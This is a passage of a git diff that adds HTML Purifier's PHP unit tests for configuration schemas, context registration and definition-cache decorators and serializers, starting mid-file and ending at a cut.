true)); + $this->schema->addValueAliases('Instrument.Manufacturer', array( + 'Selmer' => 'Conn-Selmer')); + + // case insensitive + $this->schema->add('Instrument.Family', 'woodwind', 'istring', false); + $this->schema->addAllowedValues('Instrument.Family', array( + 'brass' => true, 'woodwind' => true, 'percussion' => true, + 'string' => true, 'keyboard' => true, 'electronic' => true)); + $this->schema->addValueAliases('Instrument.Family', array( + 'synth' => 'electronic')); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + $config->chatty = false; + + // case sensitive + + $config->set('Instrument.Manufacturer', 'Vandoren'); + $this->assertIdentical($config->get('Instrument.Manufacturer'), 'Vandoren'); + + $config->set('Instrument.Manufacturer', 'Selmer'); + $this->assertIdentical($config->get('Instrument.Manufacturer'), 'Conn-Selmer'); + + $this->expectError('Value not supported, valid values are: Yamaha, Conn-Selmer, Vandoren, Laubin, Buffet, other'); + $config->set('Instrument.Manufacturer', 'buffet'); + + // case insensitive + + $config->set('Instrument.Family', 'brass'); + $this->assertIdentical($config->get('Instrument.Family'), 'brass'); + + $config->set('Instrument.Family', 'PERCUSSION'); + $this->assertIdentical($config->get('Instrument.Family'), 'percussion'); + + $config->set('Instrument.Family', 'synth'); + $this->assertIdentical($config->get('Instrument.Family'), 'electronic'); + + $config->set('Instrument.Family', 'Synth'); + $this->assertIdentical($config->get('Instrument.Family'), 'electronic'); + + } + + function testNull() { + + $this->schema->add('ReportCard.English', null, 'string', true); + $this->schema->add('ReportCard.Absences', 0, 'int', false); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + $config->chatty = false; + + $config->set('ReportCard.English', 'B-'); + $this->assertIdentical($config->get('ReportCard.English'), 'B-'); + + $config->set('ReportCard.English', null); // not yet graded + $this->assertIdentical($config->get('ReportCard.English'), null); + + // error + $this->expectError('Value for ReportCard.Absences is of invalid type, should be int'); + $config->set('ReportCard.Absences', null); + + } + + function testAliases() { + + $this->schema->add('Home.Rug', 3, 'int', false); + $this->schema->addAlias('Home.Carpet', 'Home.Rug'); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + $config->chatty = false; + + $this->assertIdentical($config->get('Home.Rug'), 3); + + $this->expectError('Cannot get value from aliased directive, use real name Home.Rug'); + $config->get('Home.Carpet'); + + $this->expectError('Home.Carpet is an alias, preferred directive name is Home.Rug'); + $config->set('Home.Carpet', 999); + $this->assertIdentical($config->get('Home.Rug'), 999); + + } + + // test functionality based on method + + function test_getBatch() { + + $this->schema->add('Variables.TangentialAcceleration', 'a_tan', 'string', false); + $this->schema->add('Variables.AngularAcceleration', 'alpha', 'string', false); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + $config->chatty = false; + + // grab a namespace + $this->assertIdentical( + $config->getBatch('Variables'), + array( + 'TangentialAcceleration' => 'a_tan', + 'AngularAcceleration' => 'alpha' + ) + ); + + // grab a non-existant namespace + $this->expectError('Cannot retrieve undefined namespace Constants'); + $config->getBatch('Constants'); + + } + + function test_loadIni() { + + $this->schema->add('Shortcut.Copy', 'c', 'istring', false); + $this->schema->add('Shortcut.Paste', 'v', 'istring', false); + $this->schema->add('Shortcut.Cut', 'x', 'istring', false); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + + $config->loadIni(dirname(__FILE__) . '/ConfigTest-loadIni.ini'); + + $this->assertIdentical($config->get('Shortcut.Copy'), 'q'); + $this->assertIdentical($config->get('Shortcut.Paste'), 'p'); + $this->assertIdentical($config->get('Shortcut.Cut'), 't'); + + } + + function test_getHTMLDefinition() { + + // we actually want to use the old copy, because the definition + // generation routines have dependencies on configuration values + + $config = HTMLPurifier_Config::createDefault(); + $config->set('HTML.Doctype', 'XHTML 1.0 Strict'); + $config->autoFinalize = false; + + $def = $config->getCSSDefinition(); + $this->assertIsA($def, 'HTMLPurifier_CSSDefinition'); + + $def = $config->getHTMLDefinition(); + $def2 = $config->getHTMLDefinition(); + $this->assertIsA($def, 'HTMLPurifier_HTMLDefinition'); + $this->assertTrue($def === $def2); + $this->assertTrue($def->setup); + + $old_def = clone $def2; + + $config->set('HTML.Doctype', 'HTML 4.01 Transitional'); + $def = $config->getHTMLDefinition(); + $this->assertIsA($def, 'HTMLPurifier_HTMLDefinition'); + $this->assertTrue($def !== $old_def); + $this->assertTrue($def->setup); + + } + + function test_getHTMLDefinition_deprecatedRawError() { + $config = HTMLPurifier_Config::createDefault(); + $config->chatty = false; + // test deprecated retrieval of raw definition + $config->set('HTML.DefinitionID', 'HTMLPurifier_ConfigTest->test_getHTMLDefinition()'); + $config->set('HTML.DefinitionRev', 3); + $this->expectError("Useless DefinitionID declaration"); + $def = $config->getHTMLDefinition(true); + $this->assertEqual(false, $def->setup); + + // auto initialization + $config->getHTMLDefinition(); + $this->assertTrue($def->setup); + } + + function test_getHTMLDefinition_optimizedRawError() { + $this->expectException(new HTMLPurifier_Exception("Cannot set optimized = true when raw = false")); + $config = HTMLPurifier_Config::createDefault(); + $config->getHTMLDefinition(false, true); + } + + function test_getHTMLDefinition_rawAfterSetupError() { + $this->expectException(new HTMLPurifier_Exception("Cannot retrieve raw definition after it has already been setup")); + $config = HTMLPurifier_Config::createDefault(); + $config->chatty = false; + $config->getHTMLDefinition(); + $config->getHTMLDefinition(true); + } + + function test_getHTMLDefinition_inconsistentOptimizedError() { + $this->expectError("Useless DefinitionID declaration"); + $this->expectException(new HTMLPurifier_Exception("Inconsistent use of optimized and unoptimized raw definition retrievals")); + $config = HTMLPurifier_Config::create(array('HTML.DefinitionID' => 'HTMLPurifier_ConfigTest->test_getHTMLDefinition_inconsistentOptimizedError')); + $config->chatty = false; + $config->getHTMLDefinition(true, false); + $config->getHTMLDefinition(true, true); + } + + function test_getHTMLDefinition_inconsistentOptimizedError2() { + $this->expectException(new HTMLPurifier_Exception("Inconsistent use of optimized and unoptimized raw definition retrievals")); + $config = HTMLPurifier_Config::create(array('HTML.DefinitionID' => 'HTMLPurifier_ConfigTest->test_getHTMLDefinition_inconsistentOptimizedError2')); + $config->chatty = false; + $config->getHTMLDefinition(true, true); + $config->getHTMLDefinition(true, false); + } + + function test_getHTMLDefinition_rawError() { + $config = HTMLPurifier_Config::createDefault(); + $this->expectException(new HTMLPurifier_Exception('Cannot retrieve raw version without specifying %HTML.DefinitionID')); + $def = $config->getHTMLDefinition(true, true); + } + + function test_getCSSDefinition() { + $config = HTMLPurifier_Config::createDefault(); + $def = $config->getCSSDefinition(); + $this->assertIsA($def, 'HTMLPurifier_CSSDefinition'); + } + + function test_getDefinition() { + $this->schema->add('Cache.DefinitionImpl', null, 'string', true); + $config = new HTMLPurifier_Config($this->schema); + $this->expectException(new HTMLPurifier_Exception("Definition of Crust type not supported")); + $config->getDefinition('Crust'); + } + + function test_loadArray() { + // setup a few dummy namespaces/directives for our testing + $this->schema->add('Zoo.Aadvark', 0, 'int', false); + $this->schema->add('Zoo.Boar', 0, 'int', false); + $this->schema->add('Zoo.Camel', 0, 'int', false); + $this->schema->add('Zoo.Others', array(), 'list', false); + + $config_manual = new HTMLPurifier_Config($this->schema); + $config_loadabbr = new HTMLPurifier_Config($this->schema); + $config_loadfull = new HTMLPurifier_Config($this->schema); + + $config_manual->set('Zoo.Aadvark', 3); + $config_manual->set('Zoo.Boar', 5); + $config_manual->set('Zoo.Camel', 2000); // that's a lotta camels! + $config_manual->set('Zoo.Others', array('Peacock', 'Dodo')); // wtf! + + // condensed form + $config_loadabbr->loadArray(array( + 'Zoo.Aadvark' => 3, + 'Zoo.Boar' => 5, + 'Zoo.Camel' => 2000, + 'Zoo.Others' => array('Peacock', 'Dodo') + )); + + // fully expanded form + $config_loadfull->loadArray(array( + 'Zoo' => array( + 'Aadvark' => 3, + 'Boar' => 5, + 'Camel' => 2000, + 'Others' => array('Peacock', 'Dodo') + ) + )); + + $this->assertIdentical($config_manual, $config_loadabbr); + $this->assertIdentical($config_manual, $config_loadfull); + + } + + function test_create() { + + $this->schema->add('Cake.Sprinkles', 666, 'int', false); + $this->schema->add('Cake.Flavor', 'vanilla', 'string', false); + + $config = new HTMLPurifier_Config($this->schema); + $config->set('Cake.Sprinkles', 42); + + // test flat pass-through + $created_config = HTMLPurifier_Config::create($config, $this->schema); + $this->assertIdentical($config, $created_config); + + // test loadArray + $created_config = HTMLPurifier_Config::create(array('Cake.Sprinkles' => 42), $this->schema); + $this->assertIdentical($config, $created_config); + + // test loadIni + $created_config = HTMLPurifier_Config::create(dirname(__FILE__) . '/ConfigTest-create.ini', $this->schema); + $this->assertIdentical($config, $created_config); + + } + + function test_finalize() { + + // test finalization + + $this->schema->add('Poem.Meter', 'iambic', 'string', false); + + $config = new HTMLPurifier_Config($this->schema); + $config->autoFinalize = false; + $config->chatty = false; + + $config->set('Poem.Meter', 'irregular'); + + $config->finalize(); + + $this->expectError('Cannot set directive after finalization'); + $config->set('Poem.Meter', 'vedic'); + + $this->expectError('Cannot load directives after finalization'); + $config->loadArray(array('Poem.Meter' => 'octosyllable')); + + $this->expectError('Cannot load directives after finalization'); + $config->loadIni(dirname(__FILE__) . '/ConfigTest-finalize.ini'); + + } + + function test_loadArrayFromForm() { + + $this->schema->add('Pancake.Mix', 'buttermilk', 'string', false); + $this->schema->add('Pancake.Served', true, 'bool', false); + $this->schema->add('Toppings.Syrup', true, 'bool', false); + $this->schema->add('Toppings.Flavor', 'maple', 'string', false); + $this->schema->add('Toppings.Strawberries', 3, 'int', false); + $this->schema->add('Toppings.Calories', 2000, 'int', true); + $this->schema->add('Toppings.DefinitionID', null, 'string', true); + $this->schema->add('Toppings.DefinitionRev', 1, 'int', false); + $this->schema->add('Toppings.Protected', 1, 'int', false); + + $get = array( + 'breakfast' => array( + 'Pancake.Mix' => 'nasty', + 'Pancake.Served' => '0', + 'Toppings.Syrup' => '0', + 'Toppings.Flavor' => "juice", + 'Toppings.Strawberries' => '999', + 'Toppings.Calories' => '', + 'Null_Toppings.Calories' => '1', + 'Toppings.DefinitionID' => '<argh>', + 'Toppings.DefinitionRev' => '65', + 'Toppings.Protected' => '4', + ) + ); + + $config_expect = HTMLPurifier_Config::create(array( + 'Pancake.Served' => false, + 'Toppings.Syrup' => false, + 'Toppings.Flavor' => "juice", + 'Toppings.Strawberries' => 999, + 'Toppings.Calories' => null + ), $this->schema); + + $config_result = HTMLPurifier_Config::loadArrayFromForm( + $get, 'breakfast', + array('Pancake.Served', 'Toppings', '-Toppings.Protected'), + false, // mq fix + $this->schema + ); + + $this->assertEqual($config_expect, $config_result); + + /* + MAGIC QUOTES NOT TESTED!!! + + $get = array( + 'breakfast' => array( + 'Pancake.Mix' => 'n\\asty' + ) + ); + $config_expect = HTMLPurifier_Config::create(array( + 'Pancake.Mix' => 'n\\asty' + )); + $config_result = HTMLPurifier_Config::loadArrayFromForm($get, 'breakfast', true, false); + $this->assertEqual($config_expect, $config_result); + */ + } + + function test_getAllowedDirectivesForForm() { + $this->schema->add('Unused.Unused', 'Foobar', 'string', false); + $this->schema->add('Partial.Allowed', true, 'bool', false); + $this->schema->add('Partial.Unused', 'Foobar', 'string', false); + $this->schema->add('All.Allowed', true, 'bool', false); + $this->schema->add('All.Blacklisted', 'Foobar', 'string', false); // explicitly blacklisted + $this->schema->add('All.DefinitionID', 'Foobar', 'string', true); // auto-blacklisted + $this->schema->add('All.DefinitionRev', 2, 'int', false); // auto-blacklisted + + $input = array('Partial.Allowed', 'All', '-All.Blacklisted'); + $output = HTMLPurifier_Config::getAllowedDirectivesForForm($input, $this->schema); + $expect = array( + array('Partial', 'Allowed'), + array('All', 'Allowed') + ); + + $this->assertEqual($output, $expect); + + } + + function testDeprecatedAPI() { + $this->schema->add('Foo.Bar', 2, 'int', false); + $config = new HTMLPurifier_Config($this->schema); + $config->chatty = false; + $this->expectError('Using deprecated API: use $config->set(\'Foo.Bar\', ...) instead'); + $config->set('Foo', 'Bar', 4); + $this->expectError('Using deprecated API: use $config->get(\'Foo.Bar\') instead'); + $this->assertIdentical($config->get('Foo', 'Bar'), 4); + } + + function testInherit() { + $this->schema->add('Phantom.Masked', 25, 'int', false); + $this->schema->add('Phantom.Unmasked', 89, 'int', false); + $this->schema->add('Phantom.Latemasked', 11, 'int', false); + $config = new HTMLPurifier_Config($this->schema); + $config->set('Phantom.Masked', 800); + $subconfig = HTMLPurifier_Config::inherit($config); + $config->set('Phantom.Latemasked', 100, 'int', false); + $this->assertIdentical($subconfig->get('Phantom.Masked'), 800); + $this->assertIdentical($subconfig->get('Phantom.Unmasked'), 89); + $this->assertIdentical($subconfig->get('Phantom.Latemasked'), 100); + } + + function testSerialize() { + $config = HTMLPurifier_Config::createDefault(); + $config->set('HTML.Allowed', 'a'); + $config2 = unserialize($config->serialize()); + $this->assertIdentical($config->get('HTML.Allowed'), $config2->get('HTML.Allowed')); + } + + function testDefinitionCachingNothing() { + list($mock, $config) = $this->setupCacheMock('HTML'); + // should not touch the cache + $mock->expectNever('get'); + $mock->expectNever('add'); + $mock->expectNever('set'); + $config->getDefinition('HTML', true); + $config->getDefinition('HTML', true); + $config->getDefinition('HTML'); + $this->teardownCacheMock(); + } + + function testDefinitionCachingOptimized() { + list($mock, $config) = $this->setupCacheMock('HTML'); + $mock->expectNever('set'); + $config->set('HTML.DefinitionID', 'HTMLPurifier_ConfigTest->testDefinitionCachingOptimized'); + $mock->expectOnce('get'); + $mock->setReturnValue('get', null); + $this->assertTrue($config->maybeGetRawHTMLDefinition()); + $this->assertTrue($config->maybeGetRawHTMLDefinition()); + $mock->expectOnce('add'); + $config->getDefinition('HTML'); + $this->teardownCacheMock(); + } + + function testDefinitionCachingOptimizedHit() { + $fake_config = HTMLPurifier_Config::createDefault(); + $fake_def = $fake_config->getHTMLDefinition(); + list($mock, $config) = $this->setupCacheMock('HTML'); + // should never frob cache + $mock->expectNever('add'); + $mock->expectNever('set'); + $config->set('HTML.DefinitionID', 'HTMLPurifier_ConfigTest->testDefinitionCachingOptimizedHit'); + $mock->expectOnce('get'); + $mock->setReturnValue('get', $fake_def); + $this->assertNull($config->maybeGetRawHTMLDefinition()); + $config->getDefinition('HTML'); + $config->getDefinition('HTML'); + $this->teardownCacheMock(); + } + + protected function setupCacheMock($type) { + // inject our definition cache mock globally (borrowed from + // DefinitionFactoryTest) + generate_mock_once("HTMLPurifier_DefinitionCacheFactory"); + $factory = new HTMLPurifier_DefinitionCacheFactoryMock(); + $this->oldFactory = HTMLPurifier_DefinitionCacheFactory::instance(); + HTMLPurifier_DefinitionCacheFactory::instance($factory); + generate_mock_once("HTMLPurifier_DefinitionCache"); + $mock = new HTMLPurifier_DefinitionCacheMock(); + $config = HTMLPurifier_Config::createDefault(); + $factory->setReturnValue('create', $mock, array($type, $config)); + return array($mock, $config); + } + protected function teardownCacheMock() { + HTMLPurifier_DefinitionCacheFactory::instance($this->oldFactory); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ContextTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ContextTest.php new file mode 100644 index 000000000..c5cef1651 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ContextTest.php @@ -0,0 +1,84 @@ +<?php + +// mocks +class HTMLPurifier_ContextTest extends HTMLPurifier_Harness +{ + + protected $context; + + public function setUp() { + $this->context = new HTMLPurifier_Context(); + } + + function testStandardUsage() { + + generate_mock_once('HTMLPurifier_IDAccumulator'); + + $this->assertFalse($this->context->exists('IDAccumulator')); + + $accumulator = new HTMLPurifier_IDAccumulatorMock(); + $this->context->register('IDAccumulator', $accumulator); + $this->assertTrue($this->context->exists('IDAccumulator')); + + $accumulator_2 =& $this->context->get('IDAccumulator'); + $this->assertReference($accumulator, $accumulator_2); + + $this->context->destroy('IDAccumulator'); + $this->assertFalse($this->context->exists('IDAccumulator')); + + $this->expectError('Attempted to retrieve non-existent variable IDAccumulator'); + $accumulator_3 =& $this->context->get('IDAccumulator'); + $this->assertNull($accumulator_3); + + $this->expectError('Attempted to destroy non-existent variable IDAccumulator'); + $this->context->destroy('IDAccumulator'); + + } + + function testReRegister() { + + $var = true; + $this->context->register('OnceOnly', $var); + + $this->expectError('Name OnceOnly produces collision, cannot re-register'); + $this->context->register('OnceOnly', $var); + + // destroy it, now registration is okay + $this->context->destroy('OnceOnly'); + $this->context->register('OnceOnly', $var); + + } + + function test_loadArray() { + + // references can be *really* wonky! + + $context_manual = new HTMLPurifier_Context(); + $context_load = new HTMLPurifier_Context(); + + $var1 = 1; + $var2 = 2; + + $context_manual->register('var1', $var1); + $context_manual->register('var2', $var2); + + // you MUST set up the references when constructing the array, + // otherwise the registered version will be a copy + $array = array( + 'var1' => &$var1, + 'var2' => &$var2 + ); + + $context_load->loadArray($array); + $this->assertIdentical($context_manual, $context_load); + + $var1 = 10; + $var2 = 20; + + $this->assertIdentical($context_manual, $context_load); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/CleanupTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/CleanupTest.php new file mode 100644 index 000000000..afcb0e39f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/CleanupTest.php @@ -0,0 +1,56 @@ +<?php + +generate_mock_once('HTMLPurifier_DefinitionCache'); + +class HTMLPurifier_DefinitionCache_Decorator_CleanupTest extends HTMLPurifier_DefinitionCache_DecoratorHarness +{ + + function setup() { + $this->cache = new HTMLPurifier_DefinitionCache_Decorator_Cleanup(); + parent::setup(); + } + + function setupMockForSuccess($op) { + $this->mock->expectOnce($op, array($this->def, $this->config)); + $this->mock->setReturnValue($op, true, array($this->def, $this->config)); + $this->mock->expectNever('cleanup'); + } + + function setupMockForFailure($op) { + $this->mock->expectOnce($op, array($this->def, $this->config)); + $this->mock->setReturnValue($op, false, array($this->def, $this->config)); + $this->mock->expectOnce('cleanup', array($this->config)); + } + + function test_get() { + $this->mock->expectOnce('get', array($this->config)); + $this->mock->setReturnValue('get', true, array($this->config)); + $this->mock->expectNever('cleanup'); + $this->assertEqual($this->cache->get($this->config), $this->def); + } + + function test_get_failure() { + $this->mock->expectOnce('get', array($this->config)); + $this->mock->setReturnValue('get', false, array($this->config)); + $this->mock->expectOnce('cleanup', array($this->config)); + $this->assertEqual($this->cache->get($this->config), false); + } + + function test_set() { + $this->setupMockForSuccess('set'); + $this->assertEqual($this->cache->set($this->def, $this->config), true); + } + + function test_replace() { + $this->setupMockForSuccess('replace'); + $this->assertEqual($this->cache->replace($this->def, $this->config), true); + } + + function test_add() { + $this->setupMockForSuccess('add'); + $this->assertEqual($this->cache->add($this->def, $this->config), true); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/MemoryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/MemoryTest.php new file mode 100644 index 000000000..55f2f249c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/Decorator/MemoryTest.php @@ -0,0 +1,70 @@ +<?php + +generate_mock_once('HTMLPurifier_DefinitionCache'); + +class HTMLPurifier_DefinitionCache_Decorator_MemoryTest extends HTMLPurifier_DefinitionCache_DecoratorHarness +{ + + function setup() { + $this->cache = new HTMLPurifier_DefinitionCache_Decorator_Memory(); + parent::setup(); + } + + function setupMockForSuccess($op) { + $this->mock->expectOnce($op, array($this->def, $this->config)); + $this->mock->setReturnValue($op, true, array($this->def, $this->config)); + $this->mock->expectNever('get'); + } + + function setupMockForFailure($op) { + $this->mock->expectOnce($op, array($this->def, $this->config)); + $this->mock->setReturnValue($op, false, array($this->def, $this->config)); + $this->mock->expectOnce('get', array($this->config)); + } + + function test_get() { + $this->mock->expectOnce('get', array($this->config)); // only ONE call! + $this->mock->setReturnValue('get', $this->def, array($this->config)); + $this->assertEqual($this->cache->get($this->config), $this->def); + $this->assertEqual($this->cache->get($this->config), $this->def); + } + + function test_set() { + $this->setupMockForSuccess('set', 'get'); + $this->assertEqual($this->cache->set($this->def, $this->config), true); + $this->assertEqual($this->cache->get($this->config), $this->def); + } + + function test_set_failure() { + $this->setupMockForFailure('set', 'get'); + $this->assertEqual($this->cache->set($this->def, $this->config), false); + $this->cache->get($this->config); + } + + function test_replace() { + $this->setupMockForSuccess('replace', 'get'); + $this->assertEqual($this->cache->replace($this->def, $this->config), true); + $this->assertEqual($this->cache->get($this->config), $this->def); + } + + function test_replace_failure() { + $this->setupMockForFailure('replace', 'get'); + $this->assertEqual($this->cache->replace($this->def, $this->config), false); + $this->cache->get($this->config); + } + + function test_add() { + $this->setupMockForSuccess('add', 'get'); + $this->assertEqual($this->cache->add($this->def, $this->config), true); + $this->assertEqual($this->cache->get($this->config), $this->def); + } + + function test_add_failure() { + $this->setupMockForFailure('add', 'get'); + $this->assertEqual($this->cache->add($this->def, $this->config), false); + $this->cache->get($this->config); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorHarness.php new file mode 100644 index 000000000..64951a3ed --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorHarness.php @@ -0,0 +1,23 @@ +<?php + +generate_mock_once('HTMLPurifier_DefinitionCache'); + +class HTMLPurifier_DefinitionCache_DecoratorHarness extends HTMLPurifier_DefinitionCacheHarness +{ + + function setup() { + $this->mock = new HTMLPurifier_DefinitionCacheMock(); + $this->mock->type = 'Test'; + $this->cache = $this->cache->decorate($this->mock); + $this->def = $this->generateDefinition(); + $this->config = $this->generateConfigMock(); + } + + function teardown() { + unset($this->mock); + unset($this->cache); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorTest.php new file mode 100644 index 000000000..f64967970 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/DecoratorTest.php @@ -0,0 +1,42 @@ +<?php + +class HTMLPurifier_DefinitionCache_DecoratorTest extends HTMLPurifier_DefinitionCacheHarness +{ + + function test() { + + generate_mock_once('HTMLPurifier_DefinitionCache'); + $mock = new HTMLPurifier_DefinitionCacheMock(); + $mock->type = 'Test'; + + $cache = new HTMLPurifier_DefinitionCache_Decorator(); + $cache = $cache->decorate($mock); + + $this->assertIdentical($cache->type, $mock->type); + + $def = $this->generateDefinition(); + $config = $this->generateConfigMock(); + + $mock->expectOnce('add', array($def, $config)); + $cache->add($def, $config); + + $mock->expectOnce('set', array($def, $config)); + $cache->set($def, $config); + + $mock->expectOnce('replace', array($def, $config)); + $cache->replace($def, $config); + + $mock->expectOnce('get', array($config)); + $cache->get($config); + + $mock->expectOnce('flush', array($config)); + $cache->flush($config); + + $mock->expectOnce('cleanup', array($config)); + $cache->cleanup($config); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest.php new file mode 100644 index 000000000..f6fec51ef --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest.php @@ -0,0 +1,225 @@ +<?php + +class HTMLPurifier_DefinitionCache_SerializerTest extends HTMLPurifier_DefinitionCacheHarness +{ + + function test() { + // XXX SimpleTest does some really crazy stuff in the background + // to do equality checks. Unfortunately, this makes some + // versions of PHP segfault. So we need to define a better, + // homebrew notion of equality and use that instead. For now, + // the identical asserts are commented out. + + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + + $config = $this->generateConfigMock('serial'); + $config->setReturnValue('get', 2, array('Test.DefinitionRev')); + $config->version = '1.0.0'; + + $config_md5 = '1.0.0,serial,2'; + + $file = realpath( + $rel_file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/DefinitionCache/Serializer/Test/' . + $config_md5 . '.ser' + ); + if($file && file_exists($file)) unlink($file); // prevent previous failures from causing problems + + $this->assertIdentical($config_md5, $cache->generateKey($config)); + + $def_original = $this->generateDefinition(); + + $cache->add($def_original, $config); + $this->assertFileExist($rel_file); + + $file_generated = $cache->generateFilePath($config); + $this->assertIdentical(realpath($rel_file), realpath($file_generated)); + + $def_1 = $cache->get($config); + // $this->assertIdentical($def_original, $def_1); + + $def_original->info_random = 'changed'; + + $cache->set($def_original, $config); + $def_2 = $cache->get($config); + + // $this->assertIdentical($def_original, $def_2); + // $this->assertNotEqual ($def_original, $def_1); + + $def_original->info_random = 'did it change?'; + + $this->assertFalse($cache->add($def_original, $config)); + $def_3 = $cache->get($config); + + // $this->assertNotEqual ($def_original, $def_3); // did not change! + // $this->assertIdentical($def_3, $def_2); + + $cache->replace($def_original, $config); + $def_4 = $cache->get($config); + // $this->assertIdentical($def_original, $def_4); + + $cache->remove($config); + $this->assertFileNotExist($file); + + $this->assertFalse($cache->replace($def_original, $config)); + $def_5 = $cache->get($config); + $this->assertFalse($def_5); + + } + + function test_errors() { + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + $def = $this->generateDefinition(); + $def->setup = true; + $def->type = 'NotTest'; + $config = $this->generateConfigMock('testfoo'); + + $this->expectError('Cannot use definition of type NotTest in cache for Test'); + $cache->add($def, $config); + + $this->expectError('Cannot use definition of type NotTest in cache for Test'); + $cache->set($def, $config); + + $this->expectError('Cannot use definition of type NotTest in cache for Test'); + $cache->replace($def, $config); + } + + function test_flush() { + + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + + $config1 = $this->generateConfigMock('test1'); + $config2 = $this->generateConfigMock('test2'); + $config3 = $this->generateConfigMock('test3'); + + $def1 = $this->generateDefinition(array('info_candles' => 1)); + $def2 = $this->generateDefinition(array('info_candles' => 2)); + $def3 = $this->generateDefinition(array('info_candles' => 3)); + + $cache->add($def1, $config1); + $cache->add($def2, $config2); + $cache->add($def3, $config3); + + $this->assertEqual($def1, $cache->get($config1)); + $this->assertEqual($def2, $cache->get($config2)); + $this->assertEqual($def3, $cache->get($config3)); + + $cache->flush($config1); // only essential directive is %Cache.SerializerPath + + $this->assertFalse($cache->get($config1)); + $this->assertFalse($cache->get($config2)); + $this->assertFalse($cache->get($config3)); + + } + + function testCleanup() { + + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + + // in order of age, oldest first + // note that configurations are all identical, but version/revision + // are different + + $config1 = $this->generateConfigMock(); + $config1->version = '0.9.0'; + $config1->setReturnValue('get', 574, array('Test.DefinitionRev')); + $def1 = $this->generateDefinition(array('info' => 1)); + + $config2 = $this->generateConfigMock(); + $config2->version = '1.0.0beta'; + $config2->setReturnValue('get', 1, array('Test.DefinitionRev')); + $def2 = $this->generateDefinition(array('info' => 3)); + + $cache->set($def1, $config1); + $cache->cleanup($config1); + $this->assertEqual($def1, $cache->get($config1)); // no change + + $cache->cleanup($config2); + $this->assertFalse($cache->get($config1)); + $this->assertFalse($cache->get($config2)); + + } + + function testCleanupOnlySameID() { + + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + + $config1 = $this->generateConfigMock('serial1'); + $config1->version = '1.0.0'; + $config1->setReturnValue('get', 1, array('Test.DefinitionRev')); + $def1 = $this->generateDefinition(array('info' => 1)); + + $config2 = $this->generateConfigMock('serial2'); + $config2->version = '1.0.0'; + $config2->setReturnValue('get', 34, array('Test.DefinitionRev')); + $def2 = $this->generateDefinition(array('info' => 3)); + + $cache->set($def1, $config1); + $cache->cleanup($config1); + $this->assertEqual($def1, $cache->get($config1)); // no change + + $cache->set($def2, $config2); + $cache->cleanup($config2); + $this->assertEqual($def1, $cache->get($config1)); + $this->assertEqual($def2, $cache->get($config2)); + + $cache->flush($config1); + } + + /** + * Asserts that a file exists, ignoring the stat cache + */ + function assertFileExist($file) { + clearstatcache(); + $this->assertTrue(file_exists($file), 'Expected ' . $file . ' exists'); + } + + /** + * Asserts that a file does not exist, ignoring the stat cache + */ + function assertFileNotExist($file) { + clearstatcache(); + $this->assertFalse(file_exists($file), 'Expected ' . $file . ' does not exist'); + } + + function testAlternatePath() { + + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + $config = $this->generateConfigMock('serial'); + $config->version = '1.0.0'; + $config->setReturnValue('get', 1, array('Test.DefinitionRev')); + $dir = dirname(__FILE__) . '/SerializerTest'; + $config->setReturnValue('get', $dir, array('Cache.SerializerPath')); + + $def_original = $this->generateDefinition(); + $cache->add($def_original, $config); + $this->assertFileExist($dir . '/Test/1.0.0,serial,1.ser'); + + unlink($dir . '/Test/1.0.0,serial,1.ser'); + rmdir( $dir . '/Test'); + + } + + function testAlternatePermissions() { + + $cache = new HTMLPurifier_DefinitionCache_Serializer('Test'); + $config = $this->generateConfigMock('serial'); + $config->version = '1.0.0'; + $config->setReturnValue('get', 1, array('Test.DefinitionRev')); + $dir = dirname(__FILE__) . '/SerializerTest'; + $config->setReturnValue('get', $dir, array('Cache.SerializerPath')); + $config->setReturnValue('get', 0777, array('Cache.SerializerPermissions')); + + $def_original = $this->generateDefinition(); + $cache->add($def_original, $config); + $this->assertFileExist($dir . '/Test/1.0.0,serial,1.ser'); + + $this->assertEqual(0666, 0777 & fileperms($dir . '/Test/1.0.0,serial,1.ser')); + $this->assertEqual(0777, 0777 & fileperms($dir . '/Test')); + + unlink($dir . '/Test/1.0.0,serial,1.ser'); + rmdir( $dir . '/Test'); + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest/README 